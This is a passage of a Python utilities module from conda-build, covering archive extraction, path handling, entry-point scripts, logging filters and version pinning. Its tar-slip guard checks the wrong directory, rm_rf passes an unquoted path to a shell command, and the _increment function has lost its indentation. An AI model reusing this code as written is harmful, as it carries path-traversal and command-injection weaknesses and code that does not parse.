        common += 1
    d_parts = d_parts[common:]
    f_parts = f_parts[common:]
    ups = ['..'] * len(f_parts) if f_parts else ['.']
    return '/'.join(ups + d_parts)
# This is the lowest common denominator of the formats supported by our libarchive/python-libarchive-c
# packages across all platforms
# Archive extensions every supported libarchive build can decompress.
decompressible_exts = ('.7z', '.tar', '.tar.bz2', '.tar.gz', '.tar.lzma', '.tar.xz',
                       '.tar.z', '.tar.zst', '.tgz', '.whl', '.zip', '.rpm', '.deb')


def _tar_xf_fallback(tarball, dir_path, mode='r:*'):
    """Extract *tarball* into *dir_path* using Python's tarfile module.

    Fallback for when libarchive fails (see tar_xf).  .tar.z archives are
    first decompressed with an external uncompress/gunzip binary; on
    Python 2, .tar.xz archives are first decompressed with external unxz.
    Member names are sanitized to guard against path traversal.
    """
    if tarball.lower().endswith('.tar.z'):
        uncompress = external.find_executable('uncompress')
        if not uncompress:
            uncompress = external.find_executable('gunzip')
        if not uncompress:
            sys.exit("""\
uncompress (or gunzip) is required to unarchive .z source files.
""")
        check_call_env([uncompress, '-f', tarball])
        tarball = tarball[:-2]
    if not PY3 and tarball.endswith('.tar.xz'):
        unxz = external.find_executable('unxz')
        if not unxz:
            sys.exit("""\
unxz is required to unarchive .xz source files.
""")
        check_call_env([unxz, '-f', '-k', tarball])
        tarball = tarball[:-3]
    t = tarfile.open(tarball, mode)
    members = t.getmembers()
    for i, member in enumerate(members, 0):
        # Guard against "tar slip": make absolute names relative, then strip
        # '../' components that would escape the extraction directory.
        if os.path.isabs(member.name):
            member.name = os.path.relpath(member.name, '/')
        if not os.path.realpath(member.name).startswith(os.getcwd()):
            member.name = member.name.replace("../", "")
        if not os.path.realpath(member.name).startswith(os.getcwd()):
            sys.exit("tarball contains unsafe path: " + member.name)
        members[i] = member
    if not PY3:
        t.extractall(path=dir_path.encode(codec))
    else:
        t.extractall(path=dir_path)
    t.close()
def tar_xf_file(tarball, entries):
    """Return the raw bytes of the named entry (or entries) from *tarball*.

    Raises KeyError when the number of matched entries differs from the
    number requested.  NOTE(review): the loop breaks after the first
    matching entry, so requesting multiple entries always raises — confirm
    whether multi-entry reads were ever intended.
    """
    from conda_build.utils import ensure_list
    entries = ensure_list(entries)
    if not os.path.isabs(tarball):
        tarball = os.path.join(os.getcwd(), tarball)
    result = None
    n_found = 0
    with libarchive.file_reader(tarball) as archive:
        for entry in archive:
            if entry.name in entries:
                n_found += 1
                # Concatenate the entry's data blocks into one bytes object.
                for block in entry.get_blocks():
                    if result is None:
                        result = bytes(block)
                    else:
                        result += block
                break
    if n_found != len(entries):
        raise KeyError()
    return result
def tar_xf_getnames(tarball):
    """Return the list of entry names contained in *tarball* (via libarchive)."""
    if not os.path.isabs(tarball):
        tarball = os.path.join(os.getcwd(), tarball)
    names = []
    with libarchive.file_reader(tarball) as archive:
        names.extend(entry.name for entry in archive)
    return names
def tar_xf(tarball, dir_path):
    """Extract *tarball* into *dir_path* with libarchive, using its secure
    extraction flags (no '..' traversal, no absolute paths, safe symlinks).

    Falls back to Python's tarfile for tar-family formats when libarchive
    errors out.
    """
    flags = (libarchive.extract.EXTRACT_TIME |
             libarchive.extract.EXTRACT_PERM |
             libarchive.extract.EXTRACT_SECURE_NODOTDOT |
             libarchive.extract.EXTRACT_SECURE_SYMLINKS |
             libarchive.extract.EXTRACT_SECURE_NOABSOLUTEPATHS)
    if not os.path.isabs(tarball):
        tarball = os.path.join(os.getcwd(), tarball)
    try:
        with tmp_chdir(dir_path):
            libarchive.extract_file(tarball, flags)
    except libarchive.exception.ArchiveError:
        # try again, maybe we are on Windows and the archive contains symlinks
        # https://github.com/conda/conda-build/issues/3351
        # https://github.com/libarchive/libarchive/pull/1030
        tar_like = ('.tar', '.tar.gz', '.tgz', '.tar.bz2', '.tar.z', '.tar.xz')
        if not tarball.endswith(tar_like):
            raise
        _tar_xf_fallback(tarball, dir_path)
def file_info(path):
    """Return size, md5, sha256 and mtime metadata for *path* as a dict."""
    return {'size': getsize(path),
            'md5': md5_file(path),
            'sha256': hashsum_file(path, 'sha256'),
            'mtime': getmtime(path)}
# Taken from toolz
def groupby(key, seq):
    """ Group a collection by a key function
    >>> names = ['Alice', 'Bob', 'Charlie', 'Dan', 'Edith', 'Frank']
    >>> groupby(len, names)  # doctest: +SKIP
    {3: ['Bob', 'Dan'], 5: ['Alice', 'Edith', 'Frank'], 7: ['Charlie']}
    >>> iseven = lambda x: x % 2 == 0
    >>> groupby(iseven, [1, 2, 3, 4, 5, 6, 7, 8])  # doctest: +SKIP
    {False: [1, 3, 5, 7], True: [2, 4, 6, 8]}
    Non-callable keys imply grouping on a member.
    >>> groupby('gender', [{'name': 'Alice', 'gender': 'F'},
    ...                    {'name': 'Bob', 'gender': 'M'},
    ...                    {'name': 'Charlie', 'gender': 'M'}])  # doctest:+SKIP
    {'F': [{'gender': 'F', 'name': 'Alice'}],
     'M': [{'gender': 'M', 'name': 'Bob'},
           {'gender': 'M', 'name': 'Charlie'}]}
    See Also:
        countby
    """
    # Non-callable keys group on that member/index (toolz behavior).
    if not callable(key):
        key = getter(key)
    # defaultdict(list) replaces the original bound-`[].append` trick and the
    # py2-only iteritems() unwrapping; the resulting dict is identical.
    groups = defaultdict(list)
    for item in seq:
        groups[key(item)].append(item)
    return dict(groups)
def getter(index):
    """Build an item-lookup callable from *index* (toolz-style).

    - scalar index: plain operator.itemgetter
    - list of indices: a callable returning a tuple (even for 0 or 1 index,
      where itemgetter would not return a tuple)
    """
    if not isinstance(index, list):
        return operator.itemgetter(index)
    if len(index) == 1:
        # itemgetter(i) returns a bare item; wrap to keep tuple output.
        sole = index[0]
        return lambda x: (x[sole],)
    if index:
        return operator.itemgetter(*index)
    # Empty index list: always produce an empty tuple.
    return lambda x: ()
def comma_join(items):
    """
    Like ', '.join(items) but with and

    Examples:

    >>> comma_join(['a'])
    'a'
    >>> comma_join(['a', 'b'])
    'a and b'
    >>> comma_join(['a', 'b', 'c'])
    'a, b, and c'
    """
    # (Fixed doctest: the original third example had an unterminated string
    # literal, 'c]), which would break doctest collection.)
    return ' and '.join(items) if len(items) <= 2 else ', '.join(items[:-1]) + ', and ' + items[-1]
def safe_print_unicode(*args, **kwargs):
    """
    prints unicode strings to stdout using configurable `errors` handler for
    encoding errors

    :param args: unicode strings to print to stdout
    :param sep: separator (defaults to ' ')
    :param end: ending character (defaults to '\n')
    :param errors: error handler for encoding errors (defaults to 'replace')
    """
    sep = kwargs.pop('sep', u' ')
    end = kwargs.pop('end', u'\n')
    errors = kwargs.pop('errors', 'replace')
    # py3 needs the raw byte buffer; py2's stdout accepts bytes directly.
    writer = sys.stdout.buffer.write if PY3 else sys.stdout.write
    text = sep.join(args) + end
    writer(text.encode(sys.stdout.encoding or 'utf8', errors))
def rec_glob(path, patterns):
    """Recursively collect files under *path* whose basename matches any of
    the fnmatch *patterns*.  Returns full paths."""
    matches = []
    for root, _dirs, filenames in walk(path):
        hits = []
        for pattern in patterns:
            hits.extend(fnmatch.filter(filenames, pattern))
        if hits:
            matches.extend(os.path.join(root, name) for name in hits)
    return matches
def convert_unix_path_to_win(path):
    """Translate a Unix-style path to a Windows path.

    Prefers the cygpath utility when present; otherwise falls back to the
    pure-Python conversion from conda_interface."""
    if external.find_executable('cygpath'):
        cmd = "cygpath -w {0}".format(path)
        if PY3:
            path = subprocess.getoutput(cmd)
        else:
            # py2: getoutput unavailable; strip the trailing newline/backslash.
            path = subprocess.check_output(cmd.split()).rstrip().rstrip("\\")
    else:
        path = unix_path_to_win(path)
    return path
def convert_win_path_to_unix(path):
    """Translate a Windows path to a Unix-style path.

    Prefers the cygpath utility when present; otherwise falls back to the
    pure-Python conversion from conda_interface."""
    if not external.find_executable('cygpath'):
        return win_path_to_unix(path)
    cmd = "cygpath -u {0}".format(path)
    if PY3:
        return subprocess.getoutput(cmd)
    return subprocess.check_output(cmd.split()).rstrip().rstrip("\\")
# Used for translating local paths into url (file://) paths
# http://stackoverflow.com/a/14298190/1170370
def path2url(path):
    """Convert a local filesystem path into a file:// URL."""
    return urlparse.urljoin('file:', urllib.pathname2url(path))
def get_stdlib_dir(prefix, py_ver):
    """Locate the python standard-library directory inside *prefix*.

    Looks under <prefix>/Lib (Windows) or <prefix>/lib (elsewhere).
    Prefers an existing pythonX.Y folder found on disk; otherwise derives
    the folder name from *py_ver*.
    """
    base = os.path.join(prefix, 'Lib' if sys.platform == 'win32' else 'lib')
    found = glob(os.path.join(base, 'python?.*'))
    if found:
        # glob yields an absolute path, so join just returns it unchanged.
        return os.path.join(base, found[0])
    return os.path.join(base, 'python{}'.format(py_ver))
def get_site_packages(prefix, py_ver):
    """Return the site-packages directory under *prefix* for *py_ver*."""
    return os.path.join(get_stdlib_dir(prefix, py_ver), 'site-packages')
def get_build_folders(croot):
    """Return build folders under *croot*, identified by a 10+ digit
    timestamp component somewhere in the folder name."""
    # remember, glob is not a regex.
    return glob(os.path.join(croot, "*" + "[0-9]" * 10 + "*"))
def prepend_bin_path(env, prefix, prepend_prefix=False):
    """Prepend *prefix*'s executable directories to env['PATH'] (in place).

    On Windows the Library bin trees and Scripts are added as well, and the
    prefix itself is always prepended (python.exe lives there).  Returns the
    mutated *env* for convenience.
    """
    # bin_dirname takes care of bin on *nix, Scripts on win
    env['PATH'] = join(prefix, bin_dirname) + os.pathsep + env['PATH']
    if sys.platform == "win32":
        # Fix: the original inserted a doubled os.pathsep here, producing an
        # empty PATH entry (interpreted as the CWD on Windows).
        env['PATH'] = join(prefix, "Library", "mingw-w64", "bin") + os.pathsep + \
                      join(prefix, "Library", "usr", "bin") + os.pathsep + \
                      join(prefix, "Library", "bin") + os.pathsep + \
                      join(prefix, "Scripts") + os.pathsep + \
                      env['PATH']
        prepend_prefix = True  # windows has Python in the prefix. Use it.
    if prepend_prefix:
        env['PATH'] = prefix + os.pathsep + env['PATH']
    return env
# not currently used. Leaving in because it may be useful for when we do things
# like load setup.py data, and we need the modules from some prefix other than
# the root prefix, which is what conda-build runs from.
@contextlib.contextmanager
def sys_path_prepended(prefix):
    """Context manager: temporarily insert *prefix*'s site-packages into
    sys.path (at position 1), restoring the original sys.path on exit."""
    path_backup = sys.path[:]
    if on_win:
        sys.path.insert(1, os.path.join(prefix, 'lib', 'site-packages'))
    else:
        lib_dir = os.path.join(prefix, 'lib')
        python_dir = glob(os.path.join(lib_dir, 'python[0-9\.]*'))
        if python_dir:
            python_dir = python_dir[0]
            sys.path.insert(1, os.path.join(python_dir, 'site-packages'))
    try:
        yield
    finally:
        sys.path = path_backup
@contextlib.contextmanager
def path_prepended(prefix):
    """Context manager: temporarily prepend *prefix*'s binary directories to
    os.environ['PATH'] (see prepend_bin_path), restoring PATH on exit."""
    old_path = os.environ['PATH']
    os.environ['PATH'] = prepend_bin_path(os.environ.copy(), prefix, True)['PATH']
    try:
        yield
    finally:
        os.environ['PATH'] = old_path
bin_dirname = 'Scripts' if sys.platform == 'win32' else 'bin'

# Matches "name = module.path:function" entry-point specifications.
# (raw string: the original non-raw '\s...' emits a DeprecationWarning)
entry_pat = re.compile(r'\s*([\w\-\.]+)\s*=\s*([\w.]+):([\w.]+)\s*$')


def iter_entry_points(items):
    """Yield (command, module, function) tuples parsed from entry-point
    specs of the form ``name = module:function``.

    Exits the process with an error message on a malformed spec.
    """
    for item in items:
        m = entry_pat.match(item)
        if m is None:
            # fixed typo in the original message ("cound" -> "could")
            sys.exit("Error could not match entry point: %r" % item)
        yield m.groups()
def create_entry_point(path, module, func, config):
    """Write the entry-point launcher *path* that calls *module*:*func*.

    On Windows this writes '<path>-script.py' plus a copied cli .exe
    launcher; elsewhere it writes an executable script with a shebang
    pointing at the host python (omitted for noarch packages).
    """
    import_name = func.split('.')[0]
    pyscript = PY_TMPL % {
        'module': module, 'func': func, 'import_name': import_name}
    if on_win:
        with open(path + '-script.py', 'w') as fo:
            # Debug-build pythons need the python_d launcher.
            if os.path.isfile(os.path.join(config.host_prefix, 'python_d.exe')):
                fo.write('#!python_d\n')
            fo.write(pyscript)
        copy_into(join(dirname(__file__), 'cli-{}.exe'.format(str(config.host_arch))),
                  path + '.exe', config.timeout)
    else:
        if os.path.islink(path):
            os.remove(path)
        with open(path, 'w') as fo:
            if not config.noarch:
                fo.write('#!%s\n' % config.host_python)
            fo.write(pyscript)
        os.chmod(path, 0o775)
def create_entry_points(items, config):
    """Create an entry-point launcher in the host prefix's bin/Scripts dir
    for every spec in *items* (see iter_entry_points)."""
    if not items:
        return
    bin_dir = join(config.host_prefix, bin_dirname)
    if not isdir(bin_dir):
        os.mkdir(bin_dir)
    for cmd, module, func in iter_entry_points(items):
        create_entry_point(join(bin_dir, cmd), module, func, config)
def get_ext_files(start_path, pattern):
    """Yield every file under *start_path* (recursively) whose name ends
    with *pattern*."""
    for root, _dirs, filenames in walk(start_path):
        for match in (name for name in filenames if name.endswith(pattern)):
            yield os.path.join(root, match)
# Cache of exe path -> bool ("is a Cygwin/MSYS2 binary"), to avoid re-reading
# the same executable.
_posix_exes_cache = {}


def convert_path_for_cygwin_or_msys2(exe, path):
    "If exe is a Cygwin or MSYS2 executable then filters it through `cygpath -u`"
    # No-op off Windows.
    if sys.platform != 'win32':
        return path
    if exe not in _posix_exes_cache:
        with open(exe, "rb") as exe_file:
            # Detect the POSIX runtime DLLs inside the binary image.
            exe_binary = exe_file.read()
            msys2_cygwin = re.findall(b'(cygwin1.dll|msys-2.0.dll)', exe_binary)
            _posix_exes_cache[exe] = True if msys2_cygwin else False
    if _posix_exes_cache[exe]:
        try:
            path = check_output_env(['cygpath', '-u',
                                     path]).splitlines()[0].decode(getpreferredencoding())
        # WindowsError only exists on Windows; guarded by the platform check above.
        except WindowsError:
            log = get_logger(__name__)
            log.debug('cygpath executable not found. Passing native path. This is OK for msys2.')
    return path
def get_skip_message(m):
    """Build the log message explaining why metadata *m* was skipped for the
    current variant configuration."""
    used_variant = {key: m.config.variant[key] for key in m.get_used_vars()}
    return "Skipped: {} from {} defines build/skip for this configuration ({}).".format(
        m.name(), m.path, used_variant)
def package_has_file(package_path, file_path, refresh=False):
    """Return the contents of *file_path* inside the package at
    *package_path*, or False if the package does not contain it.

    The package is extracted (fully, or just its info/ area when file_path
    starts with 'info') into conda's package cache if the file is not
    already there or refresh is requested.  Returns str when the file
    decodes as text, bytes otherwise.
    """
    # Serialize against other conda operations while touching the cache.
    locks = get_conda_operation_locks()
    possible_subdir = os.path.basename(os.path.dirname(package_path))
    possible_subdir = possible_subdir if possible_subdir in DEFAULT_SUBDIRS else ''
    with try_acquire_locks(locks, timeout=900):
        folder_name = os.path.basename(conda_package_handling.api.get_default_extracted_folder(package_path))
        # look in conda's package cache
        try:
            # conda 4.7.2 added this
            cache_path = PackageCacheData.first_writable().pkgs_dir
        except AttributeError:
            # fallback; assume writable first path. Not as reliable.
            cache_path = pkgs_dirs[0]
        cache_path = os.path.join(cache_path, possible_subdir) if possible_subdir else cache_path
        cache_path = os.path.join(cache_path, folder_name)
        resolved_file_path = os.path.join(cache_path, file_path)
        if not os.path.isfile(resolved_file_path) or refresh:
            # info/ files can be extracted alone, which is much cheaper.
            if file_path.startswith('info'):
                conda_package_handling.api.extract(package_path, cache_path, 'info')
            else:
                conda_package_handling.api.extract(package_path, cache_path)
        if not os.path.isfile(resolved_file_path):
            return False
        else:
            try:
                with open(resolved_file_path) as f:
                    content = f.read()
            except UnicodeDecodeError:
                # Binary payload: re-read raw.
                with open(resolved_file_path, 'rb') as f:
                    content = f.read()
            return content
def ensure_list(arg):
    """Normalize *arg* to a list.

    Strings and other non-iterables are wrapped in a one-element list;
    None becomes []; any other iterable is returned unchanged.
    """
    if isinstance(arg, string_types) or not hasattr(arg, '__iter__'):
        return [] if arg is None else [arg]
    return arg
@contextlib.contextmanager
def tmp_chdir(dest):
    """Context manager: chdir into *dest* for the duration of the block,
    always restoring the previous working directory afterwards."""
    saved_cwd = os.getcwd()
    try:
        os.chdir(dest)
        yield
    finally:
        os.chdir(saved_cwd)
def expand_globs(path_list, root_dir):
    """Expand each entry of *path_list* — a file, directory, symlink or glob
    pattern, absolute or relative to *root_dir* — into concrete file paths.

    Returned paths have the root_dir prefix stripped (first occurrence only),
    i.e. they are relative to root_dir.  A pattern matching nothing is
    logged as an error and contributes no paths.
    """
    matched = []
    for entry in path_list:
        full = entry if os.path.isabs(entry) else os.path.join(root_dir, entry)
        if os.path.isfile(full) or os.path.islink(full):
            # plain files and symlinks (including broken ones) pass through
            matched.append(full)
        elif os.path.isdir(full):
            # directories expand to every file beneath them
            for sub_root, _dirs, sub_files in walk(full):
                matched.extend(os.path.join(sub_root, name) for name in sub_files)
        else:
            # anything else is treated as a glob pattern
            hits = glob(full)
            if not hits:
                get_logger(__name__).error(
                    'Glob {} did not match in root_dir {}'.format(full, root_dir))
            matched.extend(hits)
    strip_prefix = re.compile('^' + re.escape('%s%s' % (root_dir, os.path.sep)))
    return [strip_prefix.sub('', name, 1) for name in matched]
def find_recipe(path):
    """Recurse through a folder locating meta.yaml (or conda.yaml).

    Returns the path of the recipe file to be built.  If a base-level
    meta.yaml exists alongside supplemental ones, the base one wins (with a
    warning); otherwise multiple matches, or no match, raise IOError.
    A direct file path to a meta.yaml/conda.yaml returns its directory.
    """
    if os.path.isfile(path) and os.path.basename(path) in ["meta.yaml", "conda.yaml"]:
        return os.path.dirname(path)
    results = rec_glob(path, ["meta.yaml", "conda.yaml"])
    if len(results) > 1:
        base_recipe = os.path.join(path, "meta.yaml")
        if base_recipe in results:
            get_logger(__name__).warn("Multiple meta.yaml files found. "
                                      "The meta.yaml file in the base directory "
                                      "will be used.")
            results = [base_recipe]
        else:
            raise IOError("More than one meta.yaml files found in %s" % path)
    elif not results:
        raise IOError("No meta.yaml or conda.yaml files found in %s" % path)
    return results[0]
class LoggingContext(object):
    """Context manager that temporarily re-levels (and optionally attaches a
    handler to) a set of loggers, silencing conda/conda-build chatter.

    On exit the previous levels are restored, the handler is detached, and
    (when close=True) closed.  Also toggles conda's context.quiet flag for
    the duration.
    """
    default_loggers = ['conda', 'binstar', 'install', 'conda.install', 'fetch', 'conda.instructions',
                       'fetch.progress', 'print', 'progress', 'dotupdate', 'stdoutlog', 'requests',
                       'conda.core.package_cache', 'conda.plan', 'conda.gateways.disk.delete',
                       'conda_build', 'conda_build.index']

    def __init__(self, level=logging.WARN, handler=None, close=True, loggers=None):
        self.level = level
        self.old_levels = {}
        self.handler = handler
        self.close = close
        self.quiet = context.quiet
        if not loggers:
            self.loggers = LoggingContext.default_loggers
        else:
            self.loggers = loggers

    def __enter__(self):
        for logger in self.loggers:
            if isinstance(logger, string_types):
                log = logging.getLogger(logger)
                self.old_levels[logger] = log.level
                # 'install' loggers stay a notch quieter unless we're below INFO.
                log.setLevel(self.level if ('install' not in logger or
                                            self.level < logging.INFO) else self.level + 10)
                if self.handler:
                    # Fix: the original referenced self.logger, an attribute
                    # that was never assigned, so passing a handler raised
                    # AttributeError.  Attach it to each managed logger.
                    log.addHandler(self.handler)
        context.quiet = True

    def __exit__(self, et, ev, tb):
        for logger, level in self.old_levels.items():
            log = logging.getLogger(logger)
            log.setLevel(level)
            if self.handler:
                log.removeHandler(self.handler)
        if self.handler and self.close:
            self.handler.close()
        context.quiet = self.quiet
        # implicit return of None => don't swallow exceptions
def get_installed_packages(path):
    """Return {package_name: metadata} for every package installed in ``path``.

    Reads each ``conda-meta/*.json`` file (assumed to be in 'index.json'
    format) under ``path``.
    """
    packages = {}
    for meta_file in glob(os.path.join(path, 'conda-meta', '*.json')):
        with open(meta_file) as fh:
            record = json.load(fh)
        packages[record['name']] = record
    return packages
def _convert_lists_to_sets(_dict):
    """Recursively normalize ``_dict`` in place for stable hashing.

    Nested mappings become HashableDict; non-string iterables are
    de-duplicated and sorted (falling back to tuple-izing unhashable
    elements).  Returns the same, mutated, dict.
    """
    for key, val in _dict.items():
        if hasattr(val, 'keys'):
            _dict[key] = HashableDict(_convert_lists_to_sets(val))
        elif hasattr(val, '__iter__') and not isinstance(val, string_types):
            try:
                _dict[key] = sorted(set(val))
            except TypeError:
                # elements themselves are unhashable (e.g. lists): tuple-ize them
                _dict[key] = sorted(set(tuple(item) for item in val))
    return _dict
class HashableDict(dict):
    """A dict that can live inside sets: contents are normalized on creation
    and hashing is done over a canonical, key-sorted JSON dump."""

    def __init__(self, *args, **kwargs):
        super(HashableDict, self).__init__(*args, **kwargs)
        # normalization mutates this dict in place
        _convert_lists_to_sets(self)

    def __hash__(self):
        return hash(json.dumps(self, sort_keys=True))
def represent_hashabledict(dumper, data):
    """PyYAML representer that serializes a HashableDict as a plain mapping."""
    pairs = [(dumper.represent_data(item_key), dumper.represent_data(item_value))
             for item_key, item_value in data.items()]
    return yaml.nodes.MappingNode(u'tag:yaml.org,2002:map', pairs)
# Register the representer so yaml.dump can serialize HashableDict values.
yaml.add_representer(HashableDict, represent_hashabledict)
# http://stackoverflow.com/a/10743550/1170370
@contextlib.contextmanager
def capture():
    """Temporarily redirect stdout/stderr into StringIO buffers.

    Yields a two-item list; once the block exits, the items are replaced by
    the captured stdout and stderr text, respectively.
    """
    import sys
    saved_out, saved_err = sys.stdout, sys.stderr
    captured = [StringIO(), StringIO()]
    try:
        sys.stdout, sys.stderr = captured
        yield captured
    finally:
        sys.stdout, sys.stderr = saved_out, saved_err
        captured[0] = captured[0].getvalue()
        captured[1] = captured[1].getvalue()
# copied from conda; added in 4.3, not currently part of exported functionality
@contextlib.contextmanager
def env_var(name, value, callback=None):
    """Temporarily set environment variable ``name`` to ``value``.

    On exit the previous value is restored, or the variable is removed if it
    was unset before.  ``callback`` (typically conda's reset_context) is
    invoked after each change so dependent state can refresh.
    """
    # NOTE: will likely want to call reset_context() when using this function, so pass
    # it as callback
    name, value = str(name), str(value)
    saved_env_var = os.environ.get(name)
    try:
        os.environ[name] = value
        if callback:
            callback()
        yield
    finally:
        # BUG FIX: compare against None — an empty-string value is a real,
        # previously-set value and must be restored, not deleted.
        if saved_env_var is not None:
            os.environ[name] = saved_env_var
        else:
            del os.environ[name]
        if callback:
            callback()
def trim_empty_keys(dict_):
    """Recursively drop "empty" entries from ``dict_`` in place.

    Empty means [], '', {} or None.  Other falsy values (0, False) are kept,
    except for the keys in ``negative_means_empty``, where falsy also means
    "unset".  A zip_keys entry whose groups are all empty is removed too.
    """
    negative_means_empty = ('final', 'noarch_python', 'zip_keys')
    doomed = set()
    for key, val in dict_.items():
        if hasattr(val, 'keys'):
            trim_empty_keys(val)
        # empty lists, empty strings, empty dicts and None are always empty
        if val == list() or val == '' or val is None or val == dict():
            doomed.add(key)
        # other falsy values may be deliberate settings, except for these keys
        if not val and key in negative_means_empty:
            doomed.add(key)
    if 'zip_keys' in dict_ and not any(group for group in dict_['zip_keys']):
        doomed.add('zip_keys')
    for key in doomed:
        del dict_[key]
def _increment(version, alpha_ver):
try:
if alpha_ver:
suffix = 'a'
else:
suffix = '.0a0'
last_version = str(int(version) + 1) + suffix
except ValueError:
last_version = chr(ord(version) + 1)
return last_version
def apply_pin_expressions(version, min_pin='x.x.x.x.x.x.x', max_pin='x'):
    """Turn a version plus pin expressions into a conda version constraint.

    ``min_pin``/``max_pin`` are 'x.x...' strings whose number of fields says
    how many version places to keep for the lower and upper bound.  Returns
    e.g. '>=1.2.3,<1.3'; either bound is omitted when its pin is falsy.
    """
    # number of places to pin for (lower, upper); None disables that bound
    pins = [len(p.split('.')) if p else None for p in (min_pin, max_pin)]
    parsed_version = VersionOrder(version).version[1:]
    nesting_position = None
    flat_list = []
    for idx, item in enumerate(parsed_version):
        if isinstance(item, list):
            # VersionOrder nests some sub-components; remember where, so no
            # '.' separator is inserted at that boundary below
            nesting_position = idx
            flat_list.extend(item)
        else:
            flat_list.append(item)
    # clamp the upper pin to the number of places the version actually has
    if max_pin and len(max_pin.split('.')) > len(flat_list):
        pins[1] = len(flat_list)
    versions = ['', '']
    # first idx is lower bound pin; second is upper bound pin.
    # pin value is number of places to pin.
    for p_idx, pin in enumerate(pins):
        if pin:
            # flat_list is the blown-out representation of the version
            for v_idx, v in enumerate(flat_list[:pin]):
                # upper bound pin
                if p_idx == 1 and v_idx == pin - 1:
                    # is the last place an alphabetic character? OpenSSL, JPEG
                    alpha_ver = str(flat_list[min(pin, len(flat_list) - 1)]).isalpha()
                    v = _increment(v, alpha_ver)
                versions[p_idx] += str(v)
                if v_idx != nesting_position:
                    versions[p_idx] += '.'
            # strip a trailing separator left by the loop
            if versions[p_idx][-1] == '.':
                versions[p_idx] = versions[p_idx][:-1]
    if versions[0]:
        versions[0] = '>=' + versions[0]
    if versions[1]:
        versions[1] = '<' + versions[1]
    return ','.join([v for v in versions if v])
def filter_files(files_list, prefix, filter_patterns=('(.*[\\\\/])?\.git[\\\\/].*',
                                                      '(.*[\\\\/])?\.git$',
                                                      '(.*)?\.DS_Store.*',
                                                      '.*\.la$',
                                                      'conda-meta.*',
                                                      '.*\.conda_trash(?:_\d+)*$')):
    """Remove things like the .git directory from the list of files to be copied"""
    remaining = set(files_list)
    for pattern in filter_patterns:
        matcher = re.compile(pattern)
        remaining -= set(filter(matcher.match, remaining))
    # drop real directories, but keep symlinks that point at directories
    return [f for f in remaining
            if not os.path.isdir(os.path.join(prefix, f)) or
            os.path.islink(os.path.join(prefix, f))]
def filter_info_files(files_list, prefix):
    """Drop conda's own info/ metadata entries from a package file list."""
    # patterns match with either windows or posix separators
    info_metadata_patterns = (
        'info[\\\\/]index.json',
        'info[\\\\/]files',
        'info[\\\\/]paths.json',
        'info[\\\\/]about.json',
        'info[\\\\/]has_prefix',
        'info[\\\\/]hash_input_files',   # legacy, not used anymore
        'info[\\\\/]hash_input.json',
        'info[\\\\/]run_exports.yaml',   # legacy
        'info[\\\\/]run_exports.json',   # current
        'info[\\\\/]git',
        'info[\\\\/]recipe[\\\\/].*',
        'info[\\\\/]recipe_log.json',
        'info[\\\\/]recipe.tar',
        'info[\\\\/]test[\\\\/].*',
        'info[\\\\/]LICENSE.txt',        # legacy, some tests rely on this
        'info[\\\\/]licenses[\\\\/]*',
        'info[\\\\/]requires',
        'info[\\\\/]meta',
        'info[\\\\/]platform',
        'info[\\\\/]no_link',
        'info[\\\\/]link.json',
        'info[\\\\/]icon.png',
    )
    return filter_files(files_list, prefix, filter_patterns=info_metadata_patterns)
def rm_rf(path, config=None):
    """Recursively delete ``path``, best-effort (deletion errors are ignored).

    With conda >= 4.6 this delegates entirely to conda's _rm_rf.  Otherwise
    large trees are removed via a subprocess ('rd' on Windows, rsync --delete
    elsewhere) for speed, then conda's cache is cleared via _rm_rf.
    """
    if conda_46:
        return _rm_rf(path)
    if os.path.isdir(path):
        try:
            # subprocessing to delete large folders can be quite a bit faster
            if on_win:
                subprocess.check_call('rd /s /q {}'.format(path), shell=True)
            else:
                # rsync an empty directory over the target to empty it quickly
                try:
                    os.makedirs('.empty')
                except:
                    pass
                del_dir_cmd = 'rsync -a --delete .empty {}/'
                subprocess.check_call(del_dir_cmd.format(path).split())
                try:
                    shutil.rmtree('.empty')
                except:
                    pass
        # we don't really care about errors that much. People can and should
        # clean out their folders once in a while with "purge"
        except:
            pass

    conda_log_level = logging.WARN
    if config and config.debug:
        conda_log_level = logging.DEBUG
    with LoggingContext(conda_log_level):
        # this clears out the path from conda's cache, which otherwise thinks
        # that things are still installed here
        _rm_rf(path)
# https://stackoverflow.com/a/31459386/1170370
class LessThanFilter(logging.Filter):
    """Logging filter that only passes records strictly BELOW a given level."""

    def __init__(self, exclusive_maximum, name=""):
        super(LessThanFilter, self).__init__(name)
        self.max_level = exclusive_maximum

    def filter(self, record):
        # non-zero return means we log this message
        return int(record.levelno < self.max_level)
class GreaterThanFilter(logging.Filter):
    """Logging filter that only passes records strictly ABOVE a given level."""

    def __init__(self, exclusive_minimum, name=""):
        super(GreaterThanFilter, self).__init__(name)
        self.min_level = exclusive_minimum

    def filter(self, record):
        # non-zero return means we log this message
        return int(record.levelno > self.min_level)
# unclutter logs - show messages only once
class DuplicateFilter(logging.Filter):
    """Suppress any log record whose msg has already been seen."""

    def __init__(self):
        self.msgs = set()

    def filter(self, record):
        seen = record.msg in self.msgs
        self.msgs.add(record.msg)
        return int(not seen)
# Shared filter instances used by get_logger's default handlers:
# info/debug go to stdout, warnings and above to stderr, duplicates dropped.
dedupe_filter = DuplicateFilter()
info_debug_stdout_filter = LessThanFilter(logging.WARNING)
warning_error_stderr_filter = GreaterThanFilter(logging.INFO)

# set filelock's logger to only show warnings by default
logging.getLogger('filelock').setLevel(logging.WARN)

# quiet some of conda's less useful output
logging.getLogger('conda.core.linked_data').setLevel(logging.WARN)
logging.getLogger('conda.gateways.disk.delete').setLevel(logging.WARN)
logging.getLogger('conda.gateways.disk.test').setLevel(logging.WARN)
def reset_deduplicator():
    """Swap in a fresh global dedupe filter.

    Deduplication is usually desirable, but some callers (tests especially)
    need to reset the seen-message state so repeats show up again.
    """
    global dedupe_filter
    dedupe_filter = DuplicateFilter()
def get_logger(name, level=logging.INFO, dedupe=True, add_stdout_stderr_handlers=True):
    """Return conda-build's configured logger for ``name``.

    An optional YAML logging config file (conda config key 'log_config_file')
    is applied first and may override ``level`` per logger.  By default a
    dedupe filter suppresses repeated messages, and two stream handlers split
    output: info/debug to stdout, warnings and above to stderr.
    """
    config_file = None
    if cc_conda_build.get('log_config_file'):
        config_file = abspath(expanduser(expandvars(cc_conda_build.get('log_config_file'))))
    # by loading config file here, and then only adding handlers later, people
    # should be able to override conda-build's logger settings here.
    if config_file:
        with open(config_file) as f:
            config_dict = yaml.safe_load(f)
        logging.config.dictConfig(config_dict)
        # the config file's per-logger level wins over the ``level`` argument
        level = config_dict.get('loggers', {}).get(name, {}).get('level', level)
    log = logging.getLogger(name)
    log.setLevel(level)
